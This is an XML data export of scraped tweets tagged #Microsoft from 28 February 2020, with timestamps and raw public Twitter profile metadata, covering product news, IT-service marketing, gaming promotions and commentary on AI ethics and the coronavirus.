    <t>{'id': 4148271, 'id_str': '4148271', 'name': 'Lim May-Ann', 'screen_name': 'eilonwy', 'location': 'global citizen in Singapore', 'description': '#research #tech #analyst #christian #diver #speaker #publicpolicy #data #cloudcomputing #future #singapore #quantumcomputing #AI #ethics #asiapacific #ASEAN', 'url': 'https://t.co/DtWS0VLGNc', 'entities': {'url': {'urls': [{'url': 'https://t.co/DtWS0VLGNc', 'expanded_url': 'http://about.me/limmayann', 'display_url': 'about.me/limmayann', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 379, 'friends_count': 343, 'listed_count': 48, 'created_at': 'Wed Apr 11 09:12:04 +0000 2007', 'favourites_count': 197, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2586,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'http://pbs.twimg.com/profile_images/15034342/smallerIMG_3174_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/15034342/smallerIMG_3174_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4148271/1422354913', 'profile_link_color': '89C9FA',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</si>
  <si>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16:20:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 update is focused on harnessing data  TechCrunch https://t.co/kmWdJzRnTB #microsoft</t>
  </si>
  <si>
    <t>{'id': 3396756832, 'id_str': '3396756832', 'name': 'Gavriel Legynd', 'screen_name': 'gavriellegynd', 'location': 'Washington, DC', 'description': 'Entrepreneur | Author | Techie | Business Strategist | Coach - https://t.co/oQNdYG05AN', 'url': 'https://t.co/ZFxM5v04G2', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZFxM5v04G2', 'expanded_url': 'https://linktr.ee/gavriellegynd', 'display_url': 'linktr.ee/gavriellegynd', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/oQNdYG05AN', 'expanded_url': 'http://www.outwittingbroke.com', 'display_url': 'outwittingbroke.com', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 315, 'friends_count': 1442, 'listed_count': 27, 'created_at': 'Fri Jul 31 06:08:23 +0000 2015', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1849,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'http://pbs.twimg.com/profile_images/712036139507585024/ZMJXhOck_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/712036139507585024/ZMJXhOck_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3396756832/1458597805', 'profile_link_color': '19CF86',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</si>
  <si>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Feb 28 16:18:22 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in Microsoft Teams | February 2020
#MicrosoftTeams #Office365 #Microsoft #Teams #Community #MSFT
 https://t.co/zxcB4biTCr</t>
  </si>
  <si>
    <t>Fri Feb 28 16:17:21 +0000 2020</t>
  </si>
  <si>
    <t>While I commend the idea of an 'AI ethics plan', I'm not sure 3 white guys and the catholic church is really going to give it enough #diversity and inclusion. #AIEthicsPlan #IBM #Microsoft https://t.co/hlQI8FVgz7</t>
  </si>
  <si>
    <t>{'id': 87710286, 'id_str': '87710286', 'name': 'James Morris', 'screen_name': 'JimmyMorrisUK', 'location': 'England, United Kingdom', 'description': 'Lead UX Designer at Nominet - User experience, UI, Product Dev - Co-organiser of @UXOxford - *Banging* the drum for better design &amp; products for users', 'url': 'https://t.co/Q3HZDCq7Ad', 'entities': {'url': {'urls': [{'url': 'https://t.co/Q3HZDCq7Ad', 'expanded_url': 'http://jimmymorris.co.uk', 'display_url': 'jimmymorris.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 974, 'friends_count': 1264, 'listed_count': 94, 'created_at': 'Thu Nov 05 15:20:36 +0000 2009', 'favourites_count': 2424, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14139, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00293B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/591625560721358849/e_Ubp3QP_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/591625560721358849/e_Ubp3QP_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87710286/1510567557', 'profile_link_color': 'EA451E',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</si>
  <si>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Fri Feb 28 16:10:51 +0000 2020</t>
  </si>
  <si>
    <t>#SCORCH runbooks not showing in #SCCM or #SCSM - https://t.co/WmrReE5u5X #Guide #MDT #Microsoft #SCOM #IT #techblogger #mblogger #techygeekshome https://t.co/qze1qVqATF</t>
  </si>
  <si>
    <t>Fri Feb 28 16:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Why wait? The top 10 things you need to know about upgrading from Skype to Teams https://t.co/Bk0eWtnibN
#microsoft #microsoftteams #microsoftoffice365 #microsoftpartner #manageditservices #managedit #managedbysiron</t>
  </si>
  <si>
    <t>Fri Feb 28 16:08:23 +0000 2020</t>
  </si>
  <si>
    <t>Hey @MicrosoftTeams, for all the chats how can I change the font size, color, etc.? #Microsoft #MicrosoftTeams</t>
  </si>
  <si>
    <t>Fri Feb 28 16:07:45 +0000 2020</t>
  </si>
  <si>
    <t>Featured Items February 28th - March 5th, 2020
https://t.co/UGY90hgFJ5  
FREE shipping on orders of $50 CAD or more within Canada!
All prices in CAD!
#Promotions #VideoGames #Canada #Sega #Nintendo #Sony #Microsoft
2/2 https://t.co/XkJnNRIjT2</t>
  </si>
  <si>
    <t>{'id': 279075699, 'id_str': '279075699', 'name': 'PNP Games Online', 'screen_name': 'PNPGamesOnline', 'location': 'Canada', 'description': 'Your source for everything video games! Based out of Winnipeg, Manitoba, Canada.', 'url': 'https://t.co/IrZ3cH4gGJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/IrZ3cH4gGJ', 'expanded_url': 'http://www.pnpgamesonline.com', 'display_url': 'pnpgamesonline.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 186, 'friends_count': 400, 'listed_count': 1, 'created_at': 'Fri Apr 08 14:53:09 +0000 2011', 'favourites_count': 1224, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 316,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'http://pbs.twimg.com/profile_images/1304508815/pnpgamesonline_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1304508815/pnpgamesonline_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/279075699/1567189504',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</si>
  <si>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Feb 28 16:07:44 +0000 2020</t>
  </si>
  <si>
    <t>Featured Items February 28th - March 5th, 2020
https://t.co/UGY90hgFJ5  
FREE shipping on orders of $50 CAD or more within Canada!
All prices in CAD!
#Promotions #VideoGames #Canada #Sega #Nintendo #Sony #Microsoft
1/2 https://t.co/OK60R9RDhc</t>
  </si>
  <si>
    <t>Fri Feb 28 16:05:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft takes control of 50 domains operated by Thallium (APT37), a North Korean cyber-espionage group.
https://t.co/TMdLn3eR2K
#Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 16:05:30 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 has become a massive collection of services and products provided by Microsoft. Some times a 30-minute call with an expert is all you need! 
https://t.co/0Se3jdQfU4
#expertcall #futureofwork #microsoft #microsoft365 #collab365 #microjobs</t>
  </si>
  <si>
    <t>Fri Feb 28 16:05:17 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN SSTP load balancing with @F5Networks BIG-IP. #Windows10 #Win10 #Microsoft #Mobility #aovpn https://t.co/sfiFztQFh8</t>
  </si>
  <si>
    <t>Fri Feb 28 16:05:05 +0000 2020</t>
  </si>
  <si>
    <t>Need to get various Microsoft Azure subscribers throughout your organization on the same page when it comes to governance? In this article, we'll help you define, assign, track, and revise a policy in #Microsoft @Azure: https://t.co/JP79XNtcKZ #sysadmin #IT https://t.co/Ei943EL8mD</t>
  </si>
  <si>
    <t>{'id': 17527705, 'id_str': '17527705', 'name': 'Ipswitch', 'screen_name': 'Ipswitch', 'location': 'Ipswitch Inc., Lexington, MA', 'description': 'Look at any business and you will find a hard-working group of individuals tasked with the near impossible. This is the IT Team. Ipswitch is here to help them.', 'url': 'https://t.co/J0R7yafdfY', 'entities': {'url': {'urls': [{'url': 'https://t.co/J0R7yafdfY', 'expanded_url': 'http://www.ipswitch.com', 'display_url': 'ipswitch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2932, 'friends_count': 2982, 'listed_count': 546, 'created_at': 'Fri Nov 21 01:01:20 +0000 2008', 'favourites_count': 609, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12886, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '380A26', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1123578504237461504/tp46Slfs_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123578504237461504/tp46Slfs_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17527705/1560188064', 'profile_link_color': '016A77', 'profile_sidebar_border_color': 'A7B899', 'profile_sidebar_fill_color': 'CAF299', 'profile_text_color': '1F1C1F', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 16:02:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft become Green..  Fingers crossed for #apple #DowJones @AnyBodyCanFly @nishkumar1977 @Atulsingh_Asan</t>
  </si>
  <si>
    <t>{'id': 1196405735510265859, 'id_str': '1196405735510265859', 'name': 'Money Care', 'screen_name': 'MoneyGr75587197', 'location': 'India ', 'description': 'Financial education is the key for successful life. Provide guidance  regarding Stocks, Mutual funds and Financial Independence .Kindly DM for any information.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 128, 'listed_count': 1, 'created_at': 'Mon Nov 18 12:32:22 +0000 2019', 'favourites_count': 1307, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 550, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196432917699784705/fCVBshvc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196432917699784705/fCVBshvc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1196405735510265859/1575210130',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</si>
  <si>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16:01:47 +0000 2020</t>
  </si>
  <si>
    <t>#TGIF We  Tampa. Here are some things you can do this weekend!
#tampa #itbusiness #business #microsoft
 https://t.co/GK2W6tqa7v</t>
  </si>
  <si>
    <t>Fri Feb 28 16:01:43 +0000 2020</t>
  </si>
  <si>
    <t>Tired of being chained to your desk? Want to brush up on your digital skills? Check out this article to learn how you can #workremotely with help from #communication apps and tools. What are you waiting for? Get #Teamworksolutions from #Microsoft. https://t.co/4DVpzHpSYA</t>
  </si>
  <si>
    <t>{'id': 831896531049410562, 'id_str': '831896531049410562', 'name': 'Sound Power Solution', 'screen_name': 'SoundPowerSol', 'location': 'Lacey, WA', 'description': 'We are an information technology managed service and software development firm with successful experience assisting businesses covering various industries.', 'url': 'https://t.co/v39mgxgKGR', 'entities': {'url': {'urls': [{'url': 'https://t.co/v39mgxgKGR', 'expanded_url': 'http://www.soundpower.biz', 'display_url': 'soundpower.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Wed Feb 15 16:02:43 +0000 2017', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 276,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'http://pbs.twimg.com/profile_images/832242522936086529/SJUXT6GF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/832242522936086529/SJUXT6GF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/831896531049410562/1487257112',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</si>
  <si>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16:01:14 +0000 2020</t>
  </si>
  <si>
    <t>Webinar: Are you one of the 60% of O365 users without a data protection plan in place? #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/sE44hsvxzN</t>
  </si>
  <si>
    <t>{'id': 37898411, 'id_str': '37898411', 'name': 'Digital Transformation EXPO Event Series', 'screen_name': 'DTXseries', 'location': 'Manchester', 'description': 'Demystifying Technology for Business \n2020\nManchester: 25-26Mar\nLondon: 30Sep-1Oct\n#DTXmcr', 'url': 'https://t.co/qgZajO9bFh', 'entities': {'url': {'urls': [{'url': 'https://t.co/qgZajO9bFh', 'expanded_url': 'https://dt-x.io/manchester/en/page/dtx-manchester', 'display_url': 'dt-x.io/manchester/en/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11535, 'friends_count': 4666, 'listed_count': 372, 'created_at': 'Tue May 05 10:38:42 +0000 2009', 'favourites_count': 2686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12047,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'http://pbs.twimg.com/profile_images/1197817418682421248/VLNqVPJT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197817418682421248/VLNqVPJT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37898411/1574416902', 'profile_link_color': '008ABE',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</si>
  <si>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16:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Looking for good ways to ensure your #SharePoint &amp;amp; #office365 environment is suitably supported? Look no further - download our guide: https://t.co/FaKh9uhhBU 
#sharepointsupport #office365support #microsoftgoldpartner #microsoft https://t.co/0bysMSreSy</t>
  </si>
  <si>
    <t>Fri Feb 28 16:00:39 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Onsupport reduces your risk. https://t.co/Biy5BfySN6</t>
  </si>
  <si>
    <t>{'id': 1038411993579970560, 'id_str': '1038411993579970560', 'name': 'Onsupport', 'screen_name': 'Onsupport5', 'location': 'Austin, TX', 'description': 'Onsupport provides IT services and manages the technology portfolios of small and mid-sized companies throughout Central Texas.', 'url': 'https://t.co/gQKmJaeJT4', 'entities': {'url': {'urls': [{'url': 'https://t.co/gQKmJaeJT4', 'expanded_url': 'http://www.onsupport.com', 'display_url': 'onsupport.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 76, 'listed_count': 0, 'created_at': 'Sat Sep 08 13:01:26 +0000 2018', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 628, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1055857069318983681/3QXoKlaJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1055857069318983681/3QXoKlaJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1038411993579970560/1540572384',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</si>
  <si>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16:00:33 +0000 2020</t>
  </si>
  <si>
    <t>We're headed to Pennsylvania on March 19th for a #Microsoft Security CIE! 
Join us to learn how @Microsoft365 Security Solutions can better protect users, applications, businesses &amp;amp; more. 
Sign up: https://t.co/hEKT0UXQJ3
@Microsoft #MicrosoftPartner #security #IT #tech https://t.co/7LZpxyTp0K</t>
  </si>
  <si>
    <t>Fri Feb 28 16:00:29 +0000 2020</t>
  </si>
  <si>
    <t>To triste
#teammg #marriedgames #games #gaming #game #jogos #jogo #pc #console #computador #playstation #ps4 #xbox #xboxone #xboxonex #sony #microsoft #switch #nintendo #nintendogames #nintendoswitch #gamer https://t.co/OlGchkDpEL</t>
  </si>
  <si>
    <t>Fri Feb 28 16:00:03 +0000 2020</t>
  </si>
  <si>
    <t>The subject of #diversity could not have a better canvas than #India. I'd love to see #Microsoft dig in deep there. https://t.co/ZpDcqduUjq</t>
  </si>
  <si>
    <t>{'id': 2790120714, 'id_str': '2790120714', 'name': 'Jonathan Foster', 'screen_name': 'jonathanbfoster', 'location': 'Seattle', 'description': "I'm at Microsoft leading the Windows and Content Intelligence UX writing team. We make sure the best verbal design is in our products and UX. (views are my own)", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 483, 'friends_count': 171, 'listed_count': 31, 'created_at': 'Thu Sep 04 17:00:57 +0000 2014', 'favourites_count': 696, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 489,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'http://pbs.twimg.com/profile_images/884536494433501184/RykqOZz9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/884536494433501184/RykqOZz9_normal.jpg',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</si>
  <si>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15:59:11 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 15:59:08 +0000 2020</t>
  </si>
  <si>
    <t>Friday Notebook, February 28: RSA Conference; MTD news; and Android 11 COPE https://t.co/EUOwHd1Zwr via @Hybrid_Circle #HPE #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:57:15 +0000 2020</t>
  </si>
  <si>
    <t>As a Microsoft Silver Partner, our expert team can help set up your business or home with Office 365
But what do you get with an Office 365 subscription?
Head to our website for more details.
#microsoft #office #Office365 
https://t.co/BcuNpfc5pe</t>
  </si>
  <si>
    <t>{'id': 2967805348, 'id_str': '2967805348', 'name': 'Microtest Business', 'screen_name': 'MicrotestB2B', 'location': 'Bodmin, England', 'description': 'Your IT and communications team.\nNetwork/cabling, communications, repairs, servicing and IT support for your business.\nFollow @microtest for Microtest Health', 'url': 'https://t.co/4yZfpu1y4G', 'entities': {'url': {'urls': [{'url': 'https://t.co/4yZfpu1y4G', 'expanded_url': 'https://www.microtest.co.uk/retail', 'display_url': 'microtest.co.uk/retail', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 84, 'friends_count': 322, 'listed_count': 0, 'created_at': 'Thu Jan 08 13:18:06 +0000 2015', 'favourites_count': 69, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 140,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'http://pbs.twimg.com/profile_images/1080449672232218624/i6wH8Ame_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080449672232218624/i6wH8Ame_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2967805348/1580311076', 'profile_link_color': '3399CC',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</si>
  <si>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15:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Epic Games, Unity &amp;amp; #Microsoft sagen #GDC wegen #CoronaVirus ab (Update) #Gaming - https://t.co/Q9nm7u1w92</t>
  </si>
  <si>
    <t>{'id': 328108869, 'id_str': '328108869', 'name': 'Alvarez', 'screen_name': 'wikipushing', 'location': 'Austria', 'description': 'Guten Tag - ich Poste - Tweets aus denn Themenbereichen #Tech / #Apple / #Gaming / #Music / #Politik / #Alltag / English &amp; German', 'url': 'https://t.co/L9nohNKif6', 'entities': {'url': {'urls': [{'url': 'https://t.co/L9nohNKif6', 'expanded_url': 'https://bunteschwarzewelt.tumblr.com', 'display_url': 'bunteschwarzewelt.tumblr.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 806, 'friends_count': 556, 'listed_count': 0, 'created_at': 'Sat Jul 02 19:05:40 +0000 2011', 'favourites_count': 69606, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 95034, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '099877', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223727578512592897/yOL2E_ZS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223727578512592897/yOL2E_ZS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/328108869/1580209391', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 15:53:59 +0000 2020</t>
  </si>
  <si>
    <t>Keep your hands relaxed as you type with the #Microsoft Ergonomic Natural Keyboard https://t.co/BKuJsToqwq https://t.co/LS92l6WarB</t>
  </si>
  <si>
    <t>{'id': 293649550, 'id_str': '293649550', 'name': 'ITFactory.ca', 'screen_name': 'ITFactory_ca', 'location': 'Montreal', 'description': "We are #Canada's favorite online store for affordable #software &amp; #electronics since 2010. Based in #montreal.", 'url': 'https://t.co/P6lAxrnINq', 'entities': {'url': {'urls': [{'url': 'https://t.co/P6lAxrnINq', 'expanded_url': 'https://itfactory.ca/', 'display_url': 'itfactory.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 766, 'friends_count': 346, 'listed_count': 31, 'created_at': 'Thu May 05 18:37:04 +0000 2011', 'favourites_count': 269, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3224,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'http://pbs.twimg.com/profile_images/865663173734674432/SGbRyg4P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865663173734674432/SGbRyg4P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/293649550/1519662330', 'profile_link_color': '3B94D9',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</si>
  <si>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Feb 28 15:53:40 +0000 2020</t>
  </si>
  <si>
    <t>Good #powerplatform company with @CarinaMClaesson @ScottishSummit #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #Microsoft https://t.co/Haxro8MiB3</t>
  </si>
  <si>
    <t>Fri Feb 28 15:49:28 +0000 2020</t>
  </si>
  <si>
    <t>The update for #Windows 10 versions 1903 and 1909 "updates an issue that prevents the Windows Search box from rendering properly". 
Find more information on @ZDNet:
https://t.co/QngcXFETeZ
#Microsoft #software https://t.co/4vCPQBplPU</t>
  </si>
  <si>
    <t>{'id': 1070981794865049600, 'id_str': '1070981794865049600', 'name': 'Pharoscode', 'screen_name': 'pharoscode', 'location': 'Bulgaria', 'description': 'Future-oriented software development outsourcing services', 'url': 'https://t.co/JF0GeVFF1U', 'entities': {'url': {'urls': [{'url': 'https://t.co/JF0GeVFF1U', 'expanded_url': 'http://pharoscode.co', 'display_url': 'pharoscode.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 76, 'listed_count': 1, 'created_at': 'Fri Dec 07 10:02:12 +0000 2018', 'favourites_count': 97, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 167, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1070982441903501312/oGOficiS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070982441903501312/oGOficiS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1070981794865049600/1545314380',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</si>
  <si>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15:48:39 +0000 2020</t>
  </si>
  <si>
    <t>The document calls for AI to safeguard the rights of all humankind, particularly the weak and underprivileged, and for new regulations in fields such as facial recognition. #ethicalai #microsoft #ibm #safeguard https://t.co/3Msbec1rYV</t>
  </si>
  <si>
    <t>Fri Feb 28 15:48:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launched an ambitious plan a few weeks ago to become #CarbonNegative by 2030.
Any thoughts on this?
https://t.co/ddHVBL8V0l
@ExtinctionR @XRCardiff</t>
  </si>
  <si>
    <t>{'id': 2345225783, 'id_str': '2345225783', 'name': 'Juan F. Usubillaga ðŸ³ï¸\u200dðŸŒˆ', 'screen_name': 'jfusubillaga', 'location': 'Wales, United Kingdom', 'description': 'Colombian, urban designer and researcher, Cardiff University. All views my own.', 'url': 'https://t.co/hj77N0ua4k', 'entities': {'url': {'urls': [{'url': 'https://t.co/hj77N0ua4k', 'expanded_url': 'https://www.linkedin.com/in/jusubillaga/', 'display_url': 'linkedin.com/in/jusubillaga/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 427, 'listed_count': 2, 'created_at': 'Sat Feb 15 16:55:54 +0000 2014', 'favourites_count': 1961, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 937,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'http://pbs.twimg.com/profile_images/1190735336424583174/OssvO6Wi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190735336424583174/OssvO6Wi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2345225783/1572728403',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</si>
  <si>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15:48:18 +0000 2020</t>
  </si>
  <si>
    <t>Raspberry Pi 4 vs NVIDIA Jetson Nano Developer Kit
 #IoT #Microsoft
https://t.co/1vSwZwrPZH</t>
  </si>
  <si>
    <t>Fri Feb 28 15:48:10 +0000 2020</t>
  </si>
  <si>
    <t>#Business leaders: If large co's like #Microsoft, #Google &amp;amp; #Apple are impacted by #coronavirus, don't expect your business to go unscathed. Have you done your contingency planning? #cdnmedia
BBC News - Coronavirus: Microsoft warns of hit to computer sales https://t.co/InPz0iZsmA</t>
  </si>
  <si>
    <t>{'id': 552281423, 'id_str': '552281423', 'name': 'Jenifer Bartman', 'screen_name': 'JeniferInc', 'location': 'Canada', 'description': 'Author (Defusing the Family Business Time Bomb), biz advisor, media commentator (CBC News Network TV Weekend Business Panel), former venture capital exec', 'url': 'https://t.co/Vk9zm2ld1U', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vk9zm2ld1U', 'expanded_url': 'http://www.jeniferbartman.com', 'display_url': 'jeniferbartman.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 800, 'friends_count': 1215, 'listed_count': 145, 'created_at': 'Fri Apr 13 00:17:31 +0000 2012', 'favourites_count': 6020, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12443,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/822304923450621955/JebB1o06_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/822304923450621955/JebB1o06_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/552281423/1549165403', 'profile_link_color': '91D2FA',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</si>
  <si>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Fri Feb 28 15:47:10 +0000 2020</t>
  </si>
  <si>
    <t>Man who worked for Microsoft for two years stole millions of dollars from their online retail space https://t.co/Kkjfx6cQjH
#microsoft #fraud #law #criminal</t>
  </si>
  <si>
    <t>{'id': 2252251290, 'id_str': '2252251290', 'name': 'Dee Branch', 'screen_name': 'DBranch21', 'location': 'fort lauderdale', 'description': 'Started From the Bottom Now We Here', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 337, 'listed_count': 6, 'created_at': 'Wed Dec 18 16:44:50 +0000 2013', 'favourites_count': 237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9801,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'http://pbs.twimg.com/profile_images/416307201917988864/uJQkCqu1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/416307201917988864/uJQkCqu1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2252251290/1398458495',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</si>
  <si>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15:46:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 update is focused on harnessing data  TechCrunch https://t.co/dUteztVRfW #microsoft</t>
  </si>
  <si>
    <t>{'id': 2624575442, 'id_str': '2624575442', 'name': 'Nino Morales', 'screen_name': 'ActivNino', 'location': 'Georgia, USA', 'description': 'Father of 4, Entrepreneur, Finance Grad, #EdTech &amp; #Salesforce Enthusiast', 'url': 'https://t.co/CS4FecQE1f', 'entities': {'url': {'urls': [{'url': 'https://t.co/CS4FecQE1f', 'expanded_url': 'http://adp.com', 'display_url': 'adp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 891, 'friends_count': 1708, 'listed_count': 174, 'created_at': 'Sat Jul 12 12:46:37 +0000 2014', 'favourites_count': 2210, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12798,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'http://pbs.twimg.com/profile_images/487965165879431168/yw6VpSKS_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/487965165879431168/yw6VpSKS_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2624575442/1406807880',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</si>
  <si>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15:45:25 +0000 2020</t>
  </si>
  <si>
